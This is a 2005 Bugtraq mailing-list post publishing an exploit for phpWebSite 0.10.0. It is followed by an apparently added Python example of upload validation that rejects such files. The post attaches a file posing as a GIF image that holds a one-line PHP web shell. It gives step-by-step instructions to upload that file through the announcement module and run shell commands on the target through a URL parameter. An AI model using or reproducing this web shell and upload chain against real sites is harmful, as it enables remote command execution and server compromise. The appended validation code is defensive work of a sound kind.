
List:       bugtraq
Subject:    phpWebSite-0.10.0_exploit
From:       tjomka <tjomka () navigator ! lv>
Date:       2005-02-24 22:16:21
Message-ID: 1338942961.20050225001621 () navigator ! lv

phpWebSite-0.10.0_exploit
["nst.gif.php" (application/octet-stream)]

GIF89a22MMMQQQ2[[[



	|̈́UUU<pre> O

<?passthru($_GET[nst]);?>WV(QɐY_&D=S
f9[[X;
["phpWebSite-0.10.0.EN.txt" (text/plain)]

oooo...oooo.oooooooo8.ooooooooooo 
.8888o..88.888........88..888..88 
.88.888o88..888oooooo.....888     
.88...8888.........888....888     
o88o....88.o88oooo888....o888o    
********************************
**** Network security team *****
********* nst.e-nex.com ********
********************************
* Title: phpWebSite <= v0.10.0
* Bug found by: nst
* Date: 24.02.2005
********************************

Web: phpwebsite.appstate.edu

http://target/index.php?module=announce&ANN_user_op=submit_announcement&MMN_position=3:3

1. Fill in all inputs.
2. In Image: select nst.gif.php

Press Save.

Go here: http://target/images/announce/nst.gif.php?nst=ls -la
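
The upload described above succeeds because a file named nst.gif.php that begins with a GIF header is stored under its own name in a web-served directory. The following is an added example, not part of the original post and not phpWebSite code, of the server-side checks that reject such a file; the post does not say how phpWebSite validated the image, so sniff_only is a hypothetical weak check, and the extension lists and sample bytes are assumptions constructed for illustration.

```python
import os
import secrets

ALLOWED_EXT = {".gif", ".jpg", ".jpeg", ".png"}
# Assumed list of extensions a server may hand to an interpreter; match it to your config.
EXEC_EXT = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar", ".cgi", ".pl"}
MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
}

def sniff_only(data):
    """Weak check (hypothetical): trusts the leading magic bytes and ignores the name."""
    return any(data.startswith(m) for sigs in MAGIC.values() for m in sigs)

def check_upload(filename, data):
    """Return reasons to reject the upload; an empty list means accept."""
    reasons = []
    name = os.path.basename(filename.replace("\\", "/")).lower()
    parts = name.split(".")
    final_ext = "." + parts[-1] if len(parts) > 1 else ""
    if final_ext not in ALLOWED_EXT:
        reasons.append("final extension not allowed: " + (final_ext or "(none)"))
    # Check every segment: some server configs choose a handler from any extension.
    inner = sorted({"." + p for p in parts[1:]} & EXEC_EXT)
    if inner:
        reasons.append("executable extension in name: " + ", ".join(inner))
    if final_ext in MAGIC and not data.startswith(MAGIC[final_ext]):
        reasons.append("content does not match extension")
    return reasons

def stored_name(filename):
    """Server-chosen name: random stem plus the validated final extension only."""
    ext = os.path.splitext(filename.lower())[1]
    if ext not in ALLOWED_EXT:
        raise ValueError("extension not allowed")
    return secrets.token_hex(16) + ext

# Constructed sample: GIF header followed by a harmless PHP tag, named as in the advisory.
SAMPLE = b"GIF89a\x01\x00\x01\x00<?php /* placeholder */ ?>"

if __name__ == "__main__":
    print(sniff_only(SAMPLE))                    # header alone looks like a GIF
    print(check_upload("nst.gif.php", SAMPLE))   # rejected on the file name
    print(check_upload("photo.php.gif", SAMPLE))
    print(stored_name("Photo.GIF"))
```

Name checks complement, and do not replace, serving the upload directory with script execution disabled.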
